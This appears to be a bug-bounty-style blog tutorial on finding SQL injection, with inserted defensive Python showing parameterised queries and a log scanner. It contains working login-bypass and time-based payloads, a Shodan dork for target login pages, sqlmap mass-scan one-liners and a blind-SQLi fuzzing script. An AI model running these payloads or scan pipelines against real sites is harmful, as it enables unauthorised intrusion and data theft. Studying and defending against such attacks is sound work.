Nitin Yadav

How to Find SQL Injection Attack Vulnerabilities in 2022?

SQL Injection (also known as Structured Query Language injection) is one of the most popular and severe vulnerabilities out there.

It is one of the most widespread and dangerous vulnerabilities on the Internet.

It is malicious input that can be used to bypass the security controls of the application and the system behind it.

Once exploited, it gives attackers wide freedom in reading and manipulating the website's structure and content, and can give them complete control over it.

The bad thing about SQL Injection is that it is difficult to detect and stop at the time of its exploitation.

The discovery of a SQL Injection vulnerability can be horrifying, because it allows an attacker to directly access and potentially compromise the underlying data on your site.

In this article, I'll show you what SQL injection is and how to locate it.



What is SQL injection?


This attack consists of the insertion or “injection” of a SQL query via the input data from the client to the application.


It allows an attacker to view data that they are not normally able to retrieve.


This might include data belonging to other users, or any other data that the application itself is able to access.


In many cases, attackers can modify or delete this data, causing persistent changes to the application's content or behaviour.



Basic SQL Statements

  1. SELECT command - The basic statement in SQL, and the one you will use together with most of the others. You use SELECT when you want to pull something out of the database. Example: SELECT * FROM table; here SELECT * means you want all the columns, and FROM says where to take them from, in this case the table named table. Example 2: SELECT age, name FROM Class_details; here you get only the age and name columns from the table Class_details.

  2. WHERE command - It is exactly what it sounds like: a filter on the rows returned. Example: SELECT name, age FROM Class_details WHERE age < 10; this returns the name and age columns, but only for rows whose age is less than 10 years.

  3. ORDER BY command - It is used to sort the results in ascending or descending order. For ascending use ASC and for descending use DESC. Example: SELECT name, age FROM Class_details ORDER BY age; write ASC after age for ascending order and DESC for descending. With ASC the results start from the lowest age, with DESC from the highest.

  4. UNION command - It is used to combine the rows returned by two SELECT statements into one result set. Example: SELECT age, name FROM Class1_details UNION SELECT age, name FROM Class2_details; this combines the rows from both tables and removes duplicates; use UNION ALL to keep every row, duplicates included.


How to test for SQL Injection


Example 1:

Let's take the query SELECT * FROM Table WHERE id='1';

What this query says is: select all the data from the table where the id is 1.

So let's now understand what we want to do to test for SQL injection. The test is about breaking and then restoring the quoting around the value:

if we use ' the query breaks (false), and if we use '' it is valid again (true)

if we use " the query breaks (false), and if we use "" it is valid again (true)

if we use \ the query breaks (false), and if we use \\ it is valid again (true)

I know the true/false part sounds a bit confusing, but you will get it now. A single quote, double quote or backslash on its own leaves the string literal unbalanced, so the database returns an error; a pair of them is treated as an escaped character (or an empty string), so the query runs normally. If the page behaves differently for the single character and for the pair, the input is reaching the query unescaped.

When testing a website we usually only see the id parameter (or whatever other input you know about), so that is where we put these characters.

Let's say the URL is

www.website.com?id=1

and the query behind it is SELECT * FROM Table WHERE id='1';

To test it, we request

www.website.com?id=1'

or

www.website.com?id=1"

or

www.website.com?id=1\

so the queries become

SELECT * FROM Table WHERE id='1'';

SELECT * FROM Table WHERE id='1'";

SELECT * FROM Table WHERE id='1'\;

To use another SQL statement, you have to complete the query first:

SELECT * FROM Table WHERE id='1''';

or you can use

SELECT * FROM Table WHERE id='1''''''''''''UNION SELECT '2';

which may return the data for id 2.





Example 2:

Now let's assume there is a login portal and you know neither its password nor its username. Here is what we will do.

Let's look at its query:

SELECT * FROM Users WHERE username = 'correct_username' AND password = 'correct_password';

What we as a hacker will do is comment out the password part.

If you know programming, you know that a comment is ignored when the code is compiled; we do the same thing to fool the database.

What we will use is

SELECT * FROM Users WHERE username = '' OR 1=1#' AND password = '';

Here everything after # is commented out and is not read when the query is parsed. Because 1=1 is always true, the WHERE clause matches every row in Users and the password check is never evaluated.

So we will insert this query into a website like this, assuming we have a login portal that requires a username and a password:

Username :

Password :

What we will enter here is

Username : anything' OR 1=1#'

Password : anything

The query above will run and we will be able to bypass the login portal.


Other comment syntaxes are

  1. #      Hash comment

  2. /*     C-style comment

  3. -- -   SQL comment

  4. ;%00   Null byte

  5. `      Backtick
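To make the login bypass in Example 2 concrete from the defender's side, here is an added example (not code from the original post) in Python with SQLite: the concatenated query that the page's payload defeats next to the parameterised version that treats the same input as plain data. It assumes an in-memory SQLite database with one constructed user; because SQLite does not recognise # as a comment, the payload ends with -- (listed among the comment syntaxes above) instead.

```python
import sqlite3

def make_db():
    # Constructed in-memory database standing in for the page's Users table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('alice', 'correct_password')")
    return conn

def login_vulnerable(conn, username, password):
    # Builds the SQL by string concatenation: the mistake the page's bypass relies on.
    query = ("SELECT * FROM Users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None

def login_safe(conn, username, password):
    # Parameterised query: values travel separately from the SQL text, so quotes
    # and comment markers in the input are data, never syntax.
    query = "SELECT * FROM Users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None

def demo():
    conn = make_db()
    # The page's payload ends in '#', which MySQL treats as a comment; SQLite does
    # not, so the trailing comment uses '--' (also listed above) instead.
    payload = "anything' OR 1=1 -- "
    return {
        "vulnerable_bypassed": login_vulnerable(conn, payload, "anything"),
        "safe_bypassed": login_safe(conn, payload, "anything"),
        "safe_valid_login": login_safe(conn, "alice", "correct_password"),
    }

if __name__ == "__main__":
    print(demo())  # {'vulnerable_bypassed': True, 'safe_bypassed': False, 'safe_valid_login': True}
```

The same parameter placeholder technique applies to the id lookup in Example 1: once the value is bound rather than concatenated, the quote, double-quote and backslash probes no longer change the query's structure.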




Some Tips for finding SQL injection

  1. Using sqlmap with the injection marker * placed in a header: sqlmap -u "http://website.com" --header="X-Forwarded-For: 1*" --dbs --batch --random-agent --threads=10

  2. Time-based SQLi payload: '%2b(select*from(select(sleep(20)))a)%2b'

  3. Using Shodan: use the dork org:"TARGET" http.title:"login" and try the bypass admin' or 1=1

  4. Another one using sqlmap: findomain -t http://website.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1

  5. Using the header X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'

  6. Another one-liner: subfinder -d website.com -silent -all | gau --blacklist ttf,woff,svg,png | sort -u | gf sqli > sqli.txt; sqlmap -m sqli.txt --batch --risk 3 --random-agent | tee -a sqli_report.txt

  7. Another payload: 0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z

  8. Other payloads:
     > +OR+1=insert(1,1,1,1)--
     > +OR+1=replace(1,1,1)--
     > {`foo`/*bar*/(select+1)\}'
     > {`foo`/*bar*/(select%2b2)}
     > {`foo`/*bar*/(select+1+from+wp_users+where+user_pass+rlike+"(^)[$].*"+limit+1)}

  9. Use Logsensor for discovering login panels and post-form SQLi.

  10. Script I use (it takes a file of URLs as $1, substitutes each blind SQLi payload into the query-string values with qsreplace, and keeps only the responses that took 5000 ms or longer):

     #!/bin/bash
     for i in $(cat Sql\ injection/BlindSQLi.fuzzdb_seclists.txt); do
         cat $1 | grep "=" | qsreplace "$i" >> sqli
         ffuf -u FUZZ -w sqli -s -ft "<5000" | tee -a sql_script_results/vulnSqli.txt
         rm sqli
     done
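The probes in the tips above leave recognisable traces in web server logs. As an added example (not from the original post), this Python script scans access-log lines, URL-decodes the request path and the X-Forwarded-For field, and flags the same indicators: quote and backslash probes, sleep()-based delays, UNION SELECT, OR 1=1 tautologies, XOR() wrappers, null bytes and comment markers. The log format, the IP addresses and the log lines are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Indicators matching the probes described above: quote/backslash checks, sleep()
# delays, UNION SELECT, OR 1=1 tautologies, XOR(...) wrappers, null bytes, comments.
SQLI_PATTERNS = [
    (r"['\"\\]", "quote-or-backslash"),
    (r"\bsleep\s*\(", "time-based"),
    (r"\bunion\b.{0,20}\bselect\b", "union"),
    (r"\b(or|xor)\b\s*\(?\s*\d+\s*=\s*\d+", "tautology"),
    (r"\bxor\s*\(", "xor-function"),
    (r"%00|\x00", "null-byte"),
    (r"#|--|/\*", "comment-marker"),
]
# Hypothetical log format: combined log with X-Forwarded-For as a final quoted field.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
                      r'\d{3} \S+ "(?P<xff>[^"]*)"$')

def classify(value):
    """Return sorted indicator labels found in one field after URL-decoding it."""
    decoded = unquote_plus(value)  # %27 -> ' and %2b -> +, so encoded probes are caught
    return sorted({label for pat, label in SQLI_PATTERNS
                   if re.search(pat, decoded, re.IGNORECASE)})

def scan(log_lines):
    """Return (client ip, field, labels) for each request field that looks like a probe."""
    findings = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these separately
        for field in ("path", "xff"):
            labels = classify(m.group(field))
            if labels:
                findings.append((m.group("ip"), field, labels))
    return findings

# Constructed sample lines: a normal request, the page's quote probe, its time-based
# payload, its X-Forwarded-For payload, and a benign forwarded IP.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2022:13:55:36 +0000] "GET /product?id=1 HTTP/1.1" 200 512 "-"',
    '203.0.113.5 - - [10/Oct/2022:13:55:40 +0000] "GET /product?id=1%27 HTTP/1.1" 500 0 "-"',
    '203.0.113.5 - - [10/Oct/2022:13:55:44 +0000] "GET /product?id=1%27%2b(select*from(select(sleep(20)))a)%2b%27 HTTP/1.1" 200 512 "-"',
    "198.51.100.7 - - [10/Oct/2022:13:56:01 +0000] \"GET /login HTTP/1.1\" 200 300 \"0'XOR(if(now()=sysdate(),sleep(10),0))XOR'\"",
    '198.51.100.9 - - [10/Oct/2022:13:56:05 +0000] "POST /login HTTP/1.1" 302 0 "198.51.100.9"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 500 response right after a lone quote probe (as in the second sample line) is the same true/false signal Example 1 relies on, seen from the server side, and is worth alerting on together with the pattern hits.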


So that is it for today, guys.

I hope you all liked the blog. If so, comment down below, and if you find any vuln please let me know; I will be very happy to hear about it. If you want to see more blogs like this, comment below.

For writing your own blog here, you can contact me.

We will meet in another blog.

Till then,

Take care and Happy Hacking



